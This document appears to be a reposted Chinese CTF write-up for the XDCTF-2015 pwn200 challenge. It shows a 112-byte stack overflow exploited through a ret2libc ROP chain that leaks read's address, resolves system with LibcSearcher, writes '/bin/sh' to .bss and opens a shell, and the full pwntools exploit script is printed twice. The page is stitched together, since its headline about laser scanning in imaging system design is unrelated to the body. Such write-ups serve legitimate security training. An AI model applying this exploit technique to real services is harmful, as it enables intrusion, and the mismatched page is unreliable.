微头条丨成像系统设计中的激光扫描系统——多重组态

pwn200

(资料图)

—XDCTF-2015 每日一pwn，今天又做了一个pwn，那个pwn呢？？？攻防世界的进阶区里的一道小pwn题，虽然这个题考察的知识不多，rop链也比较好构建，但是还是让我又学到了一些东西，因为害怕忘记，写个博客记录记录。

1.获取pwn题

啪的一下就下载好了。

2.查看保护

拿到题我不做，哎，我干什么呢，我先查看保护！ 裸奔题，开的东西不多，所以这里就看我们发挥了

3.ida看看

首先可以很明显的看到，给的7个变量，在栈中是连续排列的，一开始我还不知道给这里的七个数赋值到底有什么用，我们继续往下看

这里的setbuf还把我搞蒙了一下，平时不是一般setbuf都是用来平衡栈帧的，但是今天这里涉及了&buf，我还以为我多输入的数据就会存在缓冲区里面呢有其他的用处呢，结果是我想多了，但是也侧面说明了我其实基础知识不够ok。

另外就是一个write函数在这里打印出来我们赋给变量的数值那么我们可以使用gdb调试进去看一看： 发现就是一串文字，然后继续看ida： 发现另外就有一个溢出函数，因为程序没有开gs，所以确定是可以溢出的。 使用cyclic 200，查看溢出发现是112

那么下一步我们查看一下有无可以直接跳转利用的函数 发现没有跳转的system函数，也没有第一时间看见bin/sh链，那么可以确定这是十分经典的ret2libc了，构建rop链，那么我可以写出前半部分的exp代码：

from pwn import *from LibcSearcher import*context.log_level="debug"p=process("./pwn200")e=ELF("./pwn200")read_got=e.got["read"]read_plt=e.plt["read"]write_plt=e.plt["write"]bss_add=e.bss()pop_add=0x0804856cinit=0x80483d0fun=0x8048484payload="a"*112+p32(write_plt)+p32(fun)+p32(1)+p32(read_got)+p32(4)p.recvuntil("Welcome to XDCTF2015~!\n")p.sendline(payload)read_add=u32(p.recv(4))print hex(read_add)

那至于网上好多人说使用什么dynelf函数来算，我也试了，因为最近github又登陆不上去，使用这个函数是需要下载想对的库的，网上查找资料后了解到，其实libcseracher和dynekf都是通过暴露出来的地址来查找对应的libc库的，但是libcseracher明显需要写的东西很少，而且功能更强，所以我们这里直接使用libcseracher！！！

另外第一个payload这里的p32(fun)的地址也可以换成start函数的地址，至于为什么不换成main函数的，是为了保持栈帧平衡。以及这里可以考虑通过write函数去暴露write函数的真实地址也可以选择暴露read函数实地址 另外这里通过已经暴露出来的计算基址，然后获得system函数的真实地址

另外这道题给我另外的一个反思点是什么呢，就是没有bin_sh的时候可以选择通过一个输入函数往bss段里面输入"/bin/sh"这样去构造，而不是一味的去查找，反正这道题我是没有查到的，但是我看其他人写的题解上面是有查到的

我通过ropgadget没有查找到，所以我们选择：

bss_add = elf.bss()payload="a"*112+p32(read_plt)+p32(pop_add)+p32(0)+p32(bss_add)+p32(8)+p32(system_add)+p32(fun)+p32(bss_add)p.sendline(payload)p.sendline("/bin/sh")

通过写函数给bss段写入我们的命令去使用，另外值得注意的是我们read函数在写完之后如何才能跳转到我们的system函数，这之间是需要三次pop的，所以综上exp如下：

from pwn import *from LibcSearcher import*context.log_level="debug"p=process("./pwn200")e=ELF("./pwn200")read_got=e.got["read"]read_plt=e.plt["read"]write_plt=e.plt["write"]bss_add=e.bss()pop_add=0x0804856cinit=0x80483d0fun=0x8048484payload="a"*112+p32(write_plt)+p32(fun)+p32(1)+p32(read_got)+p32(4)p.recvuntil("Welcome to XDCTF2015~!\n")p.sendline(payload)read_add=u32(p.recv(4))print hex(read_add)obj = LibcSearcher("read",read_add)base=read_add-obj.dump("read")system_add=base+obj.dump("system")print "sys---"+hex(system_add)print "base---"+hex(base)pause()payload="a"*112+p32(read_plt)+p32(pop_add)+p32(0)+p32(bss_add)+p32(8)+p32(system_add)+p32(fun)+p32(bss_add)p.sendline(payload)p.sendline("/bin/sh")p.interactive()

另外小插曲是我的libcseracher好像里面自带的库很少，所以暴露出来libc库计算得到的system函数的地址都是不合适的，然后学长还在他的电脑上面试了试，发现不是思路的问题，而是库的数量不够的问题。